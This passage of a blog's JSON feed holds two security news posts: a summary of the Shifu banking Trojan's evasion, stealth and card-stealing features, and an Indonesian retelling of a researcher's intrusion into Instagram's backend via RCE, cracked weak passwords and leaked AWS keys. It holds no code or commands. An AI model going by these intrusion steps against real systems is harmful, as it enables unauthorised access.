string obfuscation and anti-research  techniques were taken from Zeus VM (in its Chtonik/Maple variation),  including anti-VM and the disabling of security tools and sandboxes.\u0026nbsp;\u003c/li\u003e\u003cli\u003e\u003cb\u003eStealth\u003c/b\u003e: Part of Shifu’s stealth techniques are unique to the  Gozi/ISFB Trojan, and Shifu uses Gozi’s exact same command execution  scheme to hide itself in the Windows file system.\u003c/li\u003e\u003cli\u003e\u003cb\u003eConfig\u003c/b\u003e: The Shifu Trojan is operated with a configuration  file written in XML format — not a common format for Trojans, and  similar to the Dridex Trojan’s configuration (Dridex is a Bugat  offspring).\u0026nbsp;\u003c/li\u003e\u003cli\u003e\u003cb\u003eWipe System Restore\u003c/b\u003e: Shifu wipes the local System Restore  point on infected machines in a similar way to the Conficker worm, which  was popular in 2009.\u0026nbsp;\u003c/li\u003e\u003cli\u003e\u003cb\u003eCommuication\u003c/b\u003e \u003cb\u003eprotocol\u003c/b\u003e: Shifu implements an SSL  communication layer based on a Self-signed certificate. The implemented  module reminds analysts to the one used on Dyre Trojan campains in Late  2015.\u003c/li\u003e\u003c/ul\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003eAnother interesting feature is about \u003cb\u003ePoint\u003c/b\u003e \u003cb\u003eOf\u003c/b\u003e \u003cb\u003eSales\u003c/b\u003e.  To make matters worse, Shifu searches for specific POS memory strings  (and processes). If it finds a POS trace it starts a \"stealing credit  card numbers\" procedure.\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003ca href\u003d\"http://marcoramilli.blogspot.in/2015/09/shifu-new-interesting-banking-trojan.html\" target\u003d\"_blank\"\u003eREADMOREE\u003c/a\u003e \u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/1588396767333426914/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/new-interesting-banking-trojan.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/1588396767333426914"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/1588396767333426914"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/new-interesting-banking-trojan.html","title":"new interesting Banking Trojan"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://1.bp.blogspot.com/-lqXdlsqtj0k/VnmrRd_EHeI/AAAAAAAAAgQ/cLAgb3zdWng/s72-c/Screen%2BShot%2B2015-09-02%2Bat%2B20.27.16.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-3145887672889386998"},"published":{"$t":"2015-12-19T16:08:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.945+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"}],"title":{"type":"text","$t":"Instagram di Hack ! dari Backend Access !"},"content":{"type":"html","$t":"\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://www.hacoder.com/wp-content/uploads/2015/12/how-to-hack-instagram-640x334.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" src\u003d\"http://www.hacoder.com/wp-content/uploads/2015/12/how-to-hack-instagram-640x334.png\" height\u003d\"208\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan class\u003d\"hps\"\u003eMr\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emulai\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epenelitiannya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eke dalam sistem\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emengikuti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etip\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang ia terima dari\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eseorang teman,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebahwa halaman\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWeb\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esensu.instagram.com\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esebuah\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epanel administrasi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003euntuk layanan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e\u003cspan\u003e, adalah\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etersedia untuk umum\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emelalui Internet\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003c/span\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://www.hacoder.com/wp-content/uploads/2015/12/researcher-hacks-instagram-gets-backend-access-497792-2-640x374.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" src\u003d\"http://www.hacoder.com/wp-content/uploads/2015/12/researcher-hacks-instagram-gets-backend-access-497792-2-640x374.jpg\" height\u003d\"233\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan class\u003d\"hps\"\u003ePeneliti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ecepat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emelacak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eperangkat lunak yang digunakan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003euntuk menjalankan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epanel administrasi\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esebagai\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eSensu\u003c/span\u003e\u003cspan class\u003d\"atn\"\u003e-\u003c/span\u003e\u003cspan\u003eAdmin\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenggunakan penelitian\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang lebih tua yang\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emengatakan perangkat lunak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emungkin rentan terhadap\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eRCE\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e(\u003c/span\u003e\u003cspan\u003eeksekusi kode jauh\u003c/span\u003e\u003cspan\u003e)\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia akhirnya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eberhasil\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ememecahkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elayanan dan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eakses satu\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edari\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003efile\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekonfigurasi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang berisi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emandat untuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edatabase\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ePostgreSQL\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eSensu\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eterkait\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e \u003cspan class\u003d\"hps\"\u003eDalam\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edatabase ini\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eMr.\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003editemukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elebih dari 60\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003erekening\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emilik\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekaryawan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eFacebook\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eDia mengikuti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epenyelidikan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edengan mengambil\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebeberapa\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003estring\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epassword,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edienkripsi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emelalui\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebcrypt\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emelanjutkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003euntuk memecahkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emereka\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e \u003cspan class\u003d\"hps\"\u003eSejak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebeberapa password\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang cukup\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elemah\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e(\u003c/span\u003e\u003cspan\u003emisalnya\u003c/span\u003e\u003cspan\u003e:\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003echangeme\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003einstagram\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epassword)\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ehasil\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emuncul\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edalam beberapa menit\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edengan cepat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edapat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenindaklanjuti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epenyelidikan\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edengan masuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epada interface\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esensu.instagram.com\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003c/span\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003ch3\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan class\u003d\"hps\"\u003eMr\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenemukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esurga\u003c/span\u003e\u003cspan\u003e:\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esemua\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eselfies\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edunia\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/h3\u003e\u003ch4 style\u003d\"text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style\u003d\"font-weight: normal;\"\u003e\u003cspan class\u003d\"hps\"\u003eTapi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ePak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etidak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eberhenti di sini\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan dia\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ejuga\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etelah melihat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003efile\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekonfigurasi lainnya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia menemukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epada server\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eDi sini\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edi salah satu\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003efile\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia menemukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekunci\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eakses ke\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eakun\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eAWS\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e(\u003c/span\u003e\u003cspan\u003eAmazon Web Services\u003c/span\u003e\u003cspan\u003e)\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang kemudian\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edigunakan untuk mengakses\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebeberapa\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eember\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eS3\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e(\u003c/span\u003e\u003cspan\u003eunit\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epenyimpanan data\u003c/span\u003e\u003cspan\u003e)\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003c/span\u003e\u003c/h4\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e \u003cspan class\u003d\"hps\"\u003ePeneliti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eperjalanan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eliar\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eke lubang kelinci\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebackend\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etidak\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eberhenti di sini\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emeskipun,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia menemukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebelum\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekunci\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eAWS\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elain\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang menyebabkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edia untuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eyang lain\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003e82\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eAWS\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eS3\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eember\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etapi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eember\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eini adalah\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekhusus.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e \u003cspan class\u003d\"hps\"\u003eMr.\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etelah\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esengaja\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etersandung pada\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eInstagram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eIndonesia sumber\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esertifikat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eSSL\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekunci\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eAPI\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elain yang digunakan untuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eberinteraksi dengan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elayanan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003elainnya\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003egambar\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epengguna\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekonten statis\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edari situs\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003einstagram.com\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eatau sebagai\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epeneliti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003efasih\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emeletakkannya\u003c/span\u003e\u003cspan\u003e:\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e\"\u003c/span\u003e\u003cspan\u003eSEMUANYA\"\u003c/span\u003e \u003cspan class\u003d\"hps atn\"\u003e(\u003c/span\u003e\u003cspan\u003eselfies\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etermasuk)\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003e.\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"col-white bg-blue-75 desc\"\u003e\u003cem\u003e Instagram backend hack, short review\u003c/em\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://i1-news.softpedia-static.com/images/fitted/620x/researcher-hacks-instagram-gets-backend-access-497792-3.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" src\u003d\"http://i1-news.softpedia-static.com/images/fitted/620x/researcher-hacks-instagram-gets-backend-access-497792-3.jpg\" height\u003d\"182\" width\u003d\"400\" /\u003e\u0026nbsp;\u003c/a\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan class\u003d\"hps\"\u003eTapi di sini adalah\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edi mana\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epetualangannya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eberakhir\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekarena\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emempertimbangkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edirinya untuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenjadi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebenar\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ehat\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ehacker\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eputih\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan juga karena\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eketerbatasan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eprogram\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebug\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekarunia\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eFacebook\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eia\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eharus berhenti\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003esebelum melakukan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekerusakan nyata\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eke layanan\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e \u003cspan class\u003d\"hps\"\u003eDia mengungkapkan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etemuannya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekepada staf\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekeamanan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eFacebook\u003c/span\u003e\u003cspan\u003e, tapi\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epercakapan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003etidak berjalan seperti yang\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ediharapkan\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ebukannya\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenerima\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003epahala dari\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eFacebook\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003euntuk\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekerja kerasnya\u003c/span\u003e\u003cspan\u003e,\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eMr.\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eWineberg\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ediabaikan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003edan\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003emenegur\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003eoleh\u003c/span\u003e \u003cspan class\u003d\"hps\"\u003ekaryawan perusahaan\u003c/span\u003e\u003cspan\u003e.\u003c/span\u003e\u003c/span\u003e \u003c/div\u003e\u003cdiv class\u003d\"col-white bg-blue-75 desc\"\u003e\u003cem\u003e\u0026nbsp;\u003c/em\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan\u003e\u003cspan class\u003d\"\" id\u003d\"result_box\" lang\u003d\"id\"\u003e\u003cspan class\u003d\"hps\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/span\u003e \u003c/span\u003e\u003c/span\u003e\u003c/div\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/3145887672889386998/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/instagram-di-hack-dari-backend-access.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/3145887672889386998"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/3145887672889386998"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/instagram-di-hack-dari-backend-access.html","title":"Instagram di Hack ! dari Backend Access !"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"thr$total":{"$t":"0"}}]}});